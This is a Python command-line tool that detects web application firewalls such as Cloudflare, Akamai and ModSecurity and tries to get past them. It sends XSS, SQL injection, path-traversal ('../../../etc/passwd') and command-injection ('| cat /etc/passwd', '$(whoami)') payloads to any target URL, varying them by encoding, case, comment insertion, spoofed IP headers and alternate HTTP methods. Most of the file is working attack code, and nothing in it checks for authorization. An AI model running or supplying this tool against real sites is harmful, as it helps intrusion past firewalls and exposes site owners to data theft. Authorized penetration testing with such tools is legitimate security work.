#!/usr/bin/env python3
"""
WAF Bypass Tester Pro — Enterprise Edition
Advanced Web Application Firewall detection and bypass testing

Features:
- WAF detection (Cloudflare, AWS WAF, Akamai, Imperva, ModSecurity, etc.)
- Encoding bypass techniques
- Case manipulation bypasses
- HTTP method/parameter pollution
- Unicode/overlong UTF-8 bypasses
- Protocol-level bypasses
- Header manipulation techniques
"""

import os
import re
import json
import time
import random
import urllib.parse
from datetime import datetime, timezone
from collections import defaultdict

import requests

# Optional colors
try:
    from colorama import init, Fore, Style
    init(autoreset=True)
except Exception:
    class _C:
        def __getattr__(self, _): return ""
    Fore = Style = _C()

# Configuration
REQUEST_TIMEOUT = 15
OUTPUT_BASE = os.path.join("reports", "waf_bypass")
os.makedirs(OUTPUT_BASE, exist_ok=True)

# WAF Detection Signatures
WAF_SIGNATURES = {
    "Cloudflare": {
        "headers": ["cf-ray", "cf-cache-status", "cf-request-id"],
        "cookies": ["__cfduid", "__cf_bm", "cf_clearance"],
        "body_patterns": [r"cloudflare", r"cf-error", r"attention required"],
        "status_indicators": [403, 503],
    },
    "AWS WAF": {
        "headers": ["x-amzn-requestid", "x-amz-cf-id"],
        "body_patterns": [r"aws", r"request blocked", r"waf"],
        "status_indicators": [403],
    },
    "Akamai": {
        "headers": ["akamai-grn", "x-akamai-transformed"],
        "cookies": ["ak_bmsc", "bm_sv", "_abck"],
        "body_patterns": [r"akamai", r"reference.*#"],
        "status_indicators": [403],
    },
    "Imperva/Incapsula": {
        "headers": ["x-iinfo", "x-cdn"],
        "cookies": ["incap_ses", "visid_incap"],
        "body_patterns": [r"incapsula", r"imperva", r"robots?error"],
        "status_indicators": [403],
    },
    "ModSecurity": {
        "body_patterns": [r"mod_security", r"modsecurity", r"this error was generated by mod_security"],
        "status_indicators": [403, 406],
    },
    "F5 BIG-IP ASM": {
        "headers": ["x-wa-info"],
        "cookies": ["ts", "bigipserver"],
        "body_patterns": [r"the requested url was rejected"],
        "status_indicators": [403],
    },
    "Barracuda": {
        "body_patterns": [r"barracuda", r"barracuda_waf"],
        "cookies": ["barra_counter_session"],
        "status_indicators": [403],
    },
    "Sucuri": {
        "headers": ["x-sucuri-id", "x-sucuri-cache"],
        "body_patterns": [r"sucuri", r"cloudproxy"],
        "status_indicators": [403],
    },
    "Wordfence": {
        "body_patterns": [r"wordfence", r"generated by wordfence"],
        "status_indicators": [403],
    },
    "FortiWeb": {
        "cookies": ["FORTIWAFSID"],
        "body_patterns": [r"fortiweb", r"fortigate"],
        "status_indicators": [403],
    },
    "Comodo WAF": {
        "body_patterns": [r"protected by comodo"],
        "status_indicators": [403],
    },
    "DenyAll": {
        "cookies": ["sessioncookie"],
        "body_patterns": [r"conditionblocked", r"denyall"],
        "status_indicators": [403],
    },
}

# Bypass Techniques with payloads
BYPASS_TECHNIQUES = {
    "url_encoding": {
        "description": "URL encoding bypass",
        "transforms": [
            lambda p: urllib.parse.quote(p),
            lambda p: urllib.parse.quote(urllib.parse.quote(p)),  # Double encoding
            lambda p: "".join(f"%{ord(c):02x}" for c in p),  # Full encoding
        ],
    },
    "case_manipulation": {
        "description": "Case variation bypass",
        "transforms": [
            lambda p: p.upper(),
            lambda p: p.lower(),
            lambda p: "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(p)),
            lambda p: "".join(c.lower() if i % 2 else c.upper() for i, c in enumerate(p)),
        ],
    },
    "unicode_encoding": {
        "description": "Unicode encoding bypass",
        "transforms": [
            lambda p: p.replace("<", "\\u003c").replace(">", "\\u003e"),
            lambda p: p.replace("<", "&#x3c;").replace(">", "&#x3e;"),
            lambda p: p.replace("<", "&#60;").replace(">", "&#62;"),
            lambda p: p.replace("'", "\\u0027").replace('"', "\\u0022"),
        ],
    },
    "null_byte_injection": {
        "description": "Null byte injection",
        "transforms": [
            lambda p: p.replace(" ", "%00"),
            lambda p: f"%00{p}",
            lambda p: f"{p}%00",
        ],
    },
    "comment_injection": {
        "description": "Comment insertion bypass",
        "transforms": [
            lambda p: p.replace(" ", "/**/"),
            lambda p: p.replace("SELECT", "SEL/**/ECT"),
            lambda p: p.replace("UNION", "UN/**/ION"),
            lambda p: p.replace("script", "scr/**/ipt"),
        ],
    },
    "whitespace_variation": {
        "description": "Whitespace manipulation",
        "transforms": [
            lambda p: p.replace(" ", "\t"),
            lambda p: p.replace(" ", "\n"),
            lambda p: p.replace(" ", "\r"),
            lambda p: p.replace(" ", "   "),  # Multiple spaces
            lambda p: p.replace(" ", "%09"),  # Tab URL encoded
            lambda p: p.replace(" ", "%0a"),  # Newline URL encoded
        ],
    },
    "concatenation": {
        "description": "String concatenation bypass",
        "transforms": [
            lambda p: p.replace("script", "scr'+'ipt"),
            lambda p: p.replace("alert", "al'+'ert"),
            lambda p: p.replace("SELECT", "CONCAT('SEL','ECT')"),
        ],
    },
    "http_pollution": {
        "description": "HTTP Parameter Pollution",
        "payloads": [
            "id=1&id=2",
            "id[]=1&id[]=2",
            "id=1,2",
        ],
    },
}

# Test payloads by category
TEST_PAYLOADS = {
    "xss_basic": [
        "<script>alert(1)</script>",
        "<img src=x onerror=alert(1)>",
        "javascript:alert(1)",
        "<svg onload=alert(1)>",
        "'-alert(1)-'",
    ],
    "sqli_basic": [
        "' OR '1'='1",
        "1' OR '1'='1' --",
        "1 UNION SELECT 1,2,3--",
        "' AND 1=1--",
        "admin'--",
    ],
    "lfi_basic": [
        "../../../etc/passwd",
        "....//....//etc/passwd",
        "/etc/passwd%00",
        "....\/....\/etc/passwd",
    ],
    "rce_basic": [
        "; ls -la",
        "| cat /etc/passwd",
        "$(whoami)",
        "`id`",
    ],
}


def utc_now():
    return datetime.now(timezone.utc)


def random_headers():
    return {
        "User-Agent": random.choice([
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/122.0.0.0",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Safari/605.1.15",
            "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/122.0",
        ]),
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.9",
        "Accept-Encoding": "gzip, deflate",
    }


class WafBypassTester:
    def __init__(self, base_url):
        self.base = base_url.rstrip("/")
        self.session = requests.Session()
        self.detected_wafs = []
        self.bypass_results = []
        self.findings = []
        
    def detect_waf(self):
        """Detect WAF by analyzing normal and malicious request responses"""
        print(f"{Fore.CYAN}[*] Detecting WAF...{Style.RESET_ALL}")
        
        # Normal request
        try:
            normal_resp = self.session.get(
                self.base, 
                headers=random_headers(), 
                timeout=REQUEST_TIMEOUT,
                verify=False
            )
        except Exception as e:
            return [{"name": "Unknown", "confidence": "low", "error": str(e)}]
        
        # Malicious request to trigger WAF
        try:
            malicious_resp = self.session.get(
                f"{self.base}/?id=<script>alert(1)</script>", 
                headers=random_headers(),
                timeout=REQUEST_TIMEOUT,
                verify=False
            )
        except Exception as e:
            malicious_resp = None
            
        # Check signatures
        for waf_name, signatures in WAF_SIGNATURES.items():
            confidence = 0
            evidence = []
            
            # Check headers
            for header in signatures.get("headers", []):
                if header.lower() in (h.lower() for h in normal_resp.headers):
                    confidence += 30
                    evidence.append(f"Header: {header}")
                    
            # Check cookies
            for cookie in signatures.get("cookies", []):
                if any(cookie.lower() in c.lower() for c in self.session.cookies.keys()):
                    confidence += 25
                    evidence.append(f"Cookie: {cookie}")
                    
            # Check body patterns
            body_to_check = normal_resp.text
            if malicious_resp:
                body_to_check += " " + malicious_resp.text
                
            for pattern in signatures.get("body_patterns", []):
                if re.search(pattern, body_to_check, re.IGNORECASE):
                    confidence += 35
                    evidence.append(f"Body pattern: {pattern}")
                    
            # Check status codes
            if malicious_resp and malicious_resp.status_code in signatures.get("status_indicators", []):
                if malicious_resp.status_code != normal_resp.status_code:
                    confidence += 20
                    evidence.append(f"Status code: {malicious_resp.status_code}")
                    
            if confidence > 30:
                self.detected_wafs.append({
                    "name": waf_name,
                    "confidence": "high" if confidence > 60 else "medium",
                    "score": confidence,
                    "evidence": evidence,
                })
                
        # Check for generic WAF if no specific one detected
        if not self.detected_wafs and malicious_resp:
            if malicious_resp.status_code in [403, 406, 501, 503]:
                blocked_indicators = ["blocked", "forbidden", "denied", "security", "firewall", "protection"]
                if any(ind in malicious_resp.text.lower() for ind in blocked_indicators):
                    self.detected_wafs.append({
                        "name": "Generic WAF/IDS",
                        "confidence": "medium",
                        "evidence": [f"Status {malicious_resp.status_code} on malicious request"],
                    })
                    
        return self.detected_wafs
    
    def test_bypass(self, payload, category):
        """Test a payload with various bypass techniques"""
        results = []
        
        # Test original payload
        baseline = self._send_payload(payload)
        baseline_blocked = baseline.get("blocked", False)
        
        if not baseline_blocked:
            results.append({
                "technique": "none (direct)",
                "original_payload": payload,
                "modified_payload": payload,
                "success": True,
                "note": "Original payload passed through"
            })
            return results
            
        # Try bypass techniques
        for technique_name, technique_info in BYPASS_TECHNIQUES.items():
            if technique_name == "http_pollution":
                continue  # Handle separately
                
            for transform in technique_info.get("transforms", []):
                try:
                    modified = transform(payload)
                    if modified == payload:
                        continue
                        
                    result = self._send_payload(modified)
                    
                    if not result.get("blocked", True):
                        results.append({
                            "technique": f"{technique_name}: {technique_info['description']}",
                            "original_payload": payload,
                            "modified_payload": modified,
                            "success": True,
                            "response_code": result.get("status_code"),
                        })
                except Exception:
                    continue
                    
        return results
    
    def _send_payload(self, payload):
        """Send a payload and analyze the response"""
        try:
            url = f"{self.base}/?test={urllib.parse.quote(payload)}"
            resp = self.session.get(
                url,
                headers=random_headers(),
                timeout=REQUEST_TIMEOUT,
                verify=False,
                allow_redirects=False
            )
            
            blocked_indicators = [
                resp.status_code in [403, 406, 501, 503],
                "blocked" in resp.text.lower(),
                "forbidden" in resp.text.lower(),
                "firewall" in resp.text.lower(),
                "security" in resp.text.lower() and "violation" in resp.text.lower(),
                "waf" in resp.text.lower(),
            ]
            
            return {
                "blocked": any(blocked_indicators),
                "status_code": resp.status_code,
                "content_length": len(resp.text),
            }
        except Exception as e:
            return {"blocked": True, "error": str(e)}
    
    def test_header_bypasses(self):
        """Test header-based bypass techniques"""
        bypass_headers = [
            {"X-Originating-IP": "127.0.0.1"},
            {"X-Forwarded-For": "127.0.0.1"},
            {"X-Remote-IP": "127.0.0.1"},
            {"X-Remote-Addr": "127.0.0.1"},
            {"X-Client-IP": "127.0.0.1"},
            {"X-Real-IP": "127.0.0.1"},
            {"True-Client-IP": "127.0.0.1"},
            {"X-Custom-IP-Authorization": "127.0.0.1"},
            {"X-Forwarded-Host": "localhost"},
            {"X-Host": "localhost"},
            {"X-Original-URL": "/admin"},
            {"X-Rewrite-URL": "/admin"},
        ]
        
        results = []
        test_payload = "<script>alert(1)</script>"
        
        for bypass_header in bypass_headers:
            try:
                headers = random_headers()
                headers.update(bypass_header)
                
                resp = self.session.get(
                    f"{self.base}/?test={urllib.parse.quote(test_payload)}",
                    headers=headers,
                    timeout=REQUEST_TIMEOUT,
                    verify=False
                )
                
                if resp.status_code not in [403, 406, 503]:
                    results.append({
                        "type": "header_bypass",
                        "header": list(bypass_header.keys())[0],
                        "value": list(bypass_header.values())[0],
                        "status_code": resp.status_code,
                        "potential_bypass": True,
                    })
            except:
                continue
                
        return results
    
    def test_method_bypasses(self):
        """Test HTTP method bypass techniques"""
        methods = ["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD", "OPTIONS", "TRACE", "CONNECT"]
        results = []
        test_payload = "' OR '1'='1"
        
        for method in methods:
            try:
                resp = self.session.request(
                    method,
                    f"{self.base}/?test={urllib.parse.quote(test_payload)}",
                    headers=random_headers(),
                    timeout=REQUEST_TIMEOUT,
                    verify=False
                )
                
                if resp.status_code not in [403, 405, 406, 501, 503]:
                    results.append({
                        "type": "method_bypass",
                        "method": method,
                        "status_code": resp.status_code,
                        "potential_bypass": True,
                    })
            except:
                continue
                
        return results

    def run(self):
        """Run complete WAF bypass testing"""
        # Detect WAF
        wafs = self.detect_waf()
        
        # Test payload bypasses
        all_bypass_results = []
        for category, payloads in TEST_PAYLOADS.items():
            for payload in payloads[:2]:  # Test first 2 of each category
                results = self.test_bypass(payload, category)
                all_bypass_results.extend(results)
                time.sleep(0.5)  # Rate limiting
                
        # Test header bypasses
        header_results = self.test_header_bypasses()
        
        # Test method bypasses
        method_results = self.test_method_bypasses()
        
        # Generate findings
        successful_bypasses = [r for r in all_bypass_results if r.get("success")]
        
        if successful_bypasses:
            self.findings.append({
                "title": "WAF Bypass Techniques Found",
                "severity": "HIGH",
                "type": "WAF_BYPASS",
                "target": self.base,
                "details": f"Found {len(successful_bypasses)} bypass techniques",
                "bypasses": successful_bypasses,
            })
            
        if header_results:
            self.findings.append({
                "title": "Header-based Bypass Potential",
                "severity": "MEDIUM",
                "type": "HEADER_BYPASS",
                "target": self.base,
                "details": header_results,
            })
            
        return {
            "detected_wafs": wafs,
            "payload_bypasses": all_bypass_results,
            "header_bypasses": header_results,
            "method_bypasses": method_results,
            "findings": self.findings,
            "summary": {
                "wafs_detected": len(wafs),
                "successful_bypasses": len(successful_bypasses),
                "header_bypasses_found": len(header_results),
                "method_bypasses_found": len(method_results),
            }
        }


def main():
    import argparse
    parser = argparse.ArgumentParser(description="WAF Bypass Tester Pro")
    parser.add_argument("--target", "-t", required=True, help="Target URL")
    args = parser.parse_args()
    
    print(f"{Fore.CYAN}[*] WAF Bypass Tester Pro - Starting scan{Style.RESET_ALL}")
    print(f"{Fore.CYAN}[*] Target: {args.target}{Style.RESET_ALL}")
    
    tester = WafBypassTester(args.target)
    results = tester.run()
    
    # Display results
    if results["detected_wafs"]:
        print(f"\n{Fore.YELLOW}[!] WAF Detected:{Style.RESET_ALL}")
        for waf in results["detected_wafs"]:
            print(f"  - {waf['name']} (confidence: {waf['confidence']})")
            for ev in waf.get("evidence", []):
                print(f"    → {ev}")
    else:
        print(f"\n{Fore.GREEN}[+] No WAF detected{Style.RESET_ALL}")
        
    if results.get("payload_bypasses"):
        successful = [b for b in results["payload_bypasses"] if b.get("success")]
        if successful:
            print(f"\n{Fore.RED}[!] Successful Bypass Techniques:{Style.RESET_ALL}")
            for bypass in successful[:10]:  # Show top 10
                print(f"  - {bypass['technique']}")
                print(f"    Original: {bypass['original_payload'][:50]}...")
                print(f"    Modified: {bypass['modified_payload'][:50]}...")
                
    # Save report
    ts = datetime.now().strftime("%Y%m%d_%H%M%S")
    report_file = os.path.join(OUTPUT_BASE, f"waf_report_{ts}.json")
    with open(report_file, "w") as f:
        json.dump({"target": args.target, **results, "timestamp": utc_now().isoformat()}, f, indent=2, default=str)
    print(f"\n{Fore.CYAN}[*] Report saved: {report_file}{Style.RESET_ALL}")


if __name__ == "__main__":
    main()
